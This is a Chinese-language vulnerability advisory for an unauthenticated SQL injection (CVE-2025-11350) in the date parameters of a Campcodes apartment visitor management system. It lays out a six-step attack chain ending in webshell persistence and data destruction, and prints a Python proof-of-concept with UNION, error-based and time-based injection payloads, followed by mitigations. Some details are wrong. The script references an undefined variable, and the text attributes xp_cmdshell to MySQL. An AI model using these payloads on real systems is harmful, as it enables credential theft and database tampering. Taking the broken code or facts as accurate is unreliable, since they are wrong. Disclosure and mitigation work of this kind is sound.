CVE-2025-11350：Campcodes访客管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11350

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Online Apartment Visitor Management System

漏洞概述

CVE-2025-11350是Campcodes Online Apartment Visitor Management System 1.0版本中存在的一个高危SQL注入漏洞。该漏洞于2025年10月7日被公开披露，CVSS评分为7.3分，属于高危级别。Campcodes Online Apartment Visitor Management System是一款用于公寓访客管理的Web应用程序，旨在帮助物业管理人员记录和追踪访客信息。

该漏洞存在于系统的/bwdates-reports-details.php文件中，具体涉及对fromdate和todate两个参数的处理逻辑存在缺陷。攻击者可以通过构造恶意的SQL语句作为参数值，绕过应用程序的安全检查，直接与后端数据库进行交互。由于该漏洞属于远程可利用类型，且无需任何身份认证即可触发，攻击者可以在未经授权的情况下执行任意SQL查询，对系统安全构成严重威胁。

该漏洞的影响范围涵盖机密性、完整性和可用性三个维度，均为低级别影响。攻击者可以利用此漏洞读取数据库中的敏感信息（如用户凭证、个人信息等）、修改或删除数据库记录，甚至在特定条件下执行系统命令。目前，该漏洞的利用代码已在互联网上公开传播，任何具备基本攻击知识的攻击者都可以利用此漏洞对未打补丁的系统发起攻击，因此相关用户和组织应尽快采取修复措施。

技术细节

该漏洞属于典型的基于时间的SQL注入（SQLi）漏洞，其根本原因在于/bwdates-reports-details.php文件在处理用户提交的fromdate和todate参数时，未对输入数据进行充分的验证和过滤，直接将用户输入拼接到SQL查询语句中执行。

从技术层面分析，攻击者可以通过以下方式利用该漏洞：

1. 攻击者向目标服务器的/bwdates-reports-details.php端点发送HTTP GET或POST请求，并在fromdate和todate参数中注入恶意的SQL语句片段。例如，攻击者可以提交类似'2024-01-01' UNION SELECT username,password FROM users-- -的payload。

2. 由于应用程序未使用参数化查询（Prepared Statements）或存储过程，而是直接将用户输入拼接到SQL语句中，恶意SQL代码将被数据库引擎解析并执行。

3. 攻击者可以利用UNION SELECT语句从数据库中提取敏感数据，利用布尔盲注或时间盲注技术（如使用SLEEP()函数）在不直接显示数据的情况下推断数据库内容。

4. 在某些数据库配置下，攻击者甚至可以利用SQL注入执行系统命令（如MySQL的INTO OUTFILE、xp_cmdshell等），从而获取服务器控制权限。

漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L，表明该漏洞通过网络即可利用，攻击复杂度低，无需权限和用户交互，且对机密性、完整性和可用性均有一定影响。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统是否运行Campcodes Online Apartment Visitor Management System 1.0版本。可以通过访问/bwdates-reports-details.php端点或检查页面源代码中的特征字符串来确认。

STEP 2

步骤2：漏洞探测

攻击者向/bwdates-reports-details.php发送带有特殊字符（如单引号'）的测试请求，观察响应中是否包含SQL错误信息或异常行为，以确认SQL注入漏洞的存在。

STEP 3

步骤3：注入点确认

攻击者分别对fromdate和todate参数进行测试，通过布尔盲注、时间盲注或UNION联合查询等方式确定可利用的注入点，并评估数据库类型（MySQL、MariaDB等）。

STEP 4

步骤4：数据提取

利用确认的SQL注入漏洞，攻击者通过UNION SELECT语句或盲注技术提取数据库中的敏感信息，包括管理员凭证、用户个人信息、访客记录等。

STEP 5

步骤5：权限提升与持久化

在获取管理员凭证后，攻击者可以登录系统管理后台，进一步获取系统控制权限，或者通过SQL注入写入Webshell实现持久化访问。

STEP 6

步骤6：数据篡改或破坏

攻击者利用SQL注入的写权限，修改或删除数据库中的关键数据，破坏系统的正常运行，或植入恶意数据进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11350 - Campcodes Online Apartment Visitor Management System SQL Injection PoC
# Vulnerability: SQL Injection in /bwdates-reports-details.php (fromdate/todate parameters)
# Author: Security Researcher
# Tested on: Campcodes Online Apartment Visitor Management System 1.0

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
VULNERABLE_ENDPOINT = "/bwdates-reports-details.php"

# SQL Injection payloads targeting fromdate and todate parameters
PAYLOADS = [
    # Basic SQL injection test
    "' OR '1'='1",
    # Union-based SQL injection to extract database version
    "' UNION SELECT 1,version(),3,4,5-- -",
    # Time-based blind SQL injection
    "' AND SLEEP(5)-- -",
    # Error-based SQL injection
    "' AND extractvalue(1,concat(0x7e,version()))-- -",
    # Extract table names
    "' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -",
]

def exploit_sql_injection(target_url, parameter, payload):
    """Send SQL injection payload to the vulnerable endpoint."""
    url = f"{target_url}{VULNERABLE_ENDPOINT}"
    params = {
        "fromdate": payload if parameter == "fromdate" else "2024-01-01",
        "todate": payload if parameter == "todate" else "2024-12-31"
    }

    try:
        response = requests.get(url, params=params, timeout=30)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Request failed: {e}")
        return None

def main():
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Vulnerable endpoint: {VULNERABLE_ENDPOINT}")
    print(f"[*] Testing SQL injection on parameters: fromdate, todate\n")

    for parameter in ["fromdate", "todate"]:
        print(f"\n[+] Testing parameter: {parameter}")
        print("-" * 60)

        for i, payload in enumerate(PAYLOADS, 1):
            print(f"\n[*] Payload #{i}: {payload}")
            response = exploit_sql_injection(TARGET_URL, parameter, payload)

            if response is not None:
                print(f"[+] Status Code: {response.status_code}")
                print(f"[+] Response Length: {len(response.text)}")

                # Check for SQL error messages
                sql_errors = [
                    "SQL syntax",
                    "mysql_fetch",
                    "mysqli_fetch",
                    "Warning: mysql",
                    "unclosed quotation mark",
                    "quoted string not properly terminated"
                ]

                for error in sql_errors:
                    if error.lower() in response.text.lower():
                        print(f"[!] SQL Error detected: {error}")
                        print(f"[!] VULNERABLE to SQL injection!")
                        break

                # Display response snippet
                if len(response.text) > 0:
                    snippet = response.text[:500]
                    print(f"[*] Response snippet:\n{ssnippet}")

if __name__ == "__main__":
    main()

# Usage: python poc.py http://target.com
# Example: python poc.py http://vulnerable-apartment-system.com

影响范围

Campcodes Online Apartment Visitor Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署SQL注入防护规则，拦截针对/bwdates-reports-details.php的恶意请求；2）限制/bwdates-reports-details.php端点的访问权限，仅允许授权用户访问；3）对fromdate和todate参数实施严格的输入验证，仅允许合法的日期格式（如YYYY-MM-DD）；4）监控数据库日志，及时发现异常的SQL查询行为；5）定期备份数据库，以便在遭受攻击后能够快速恢复数据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11350
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11350
3 Details https://www.cvedetails.com/cve/CVE-2025-11350/
4 VulDB https://vuldb.com/cve/CVE-2025-11350
5 Link https://github.com/arpcyber040/CVE/issues/5
6 Link https://vuldb.com/?ctiid.327235
7 Link https://vuldb.com/?id.327235
8 Link https://vuldb.com/?submit.664908
9 Link https://www.campcodes.com/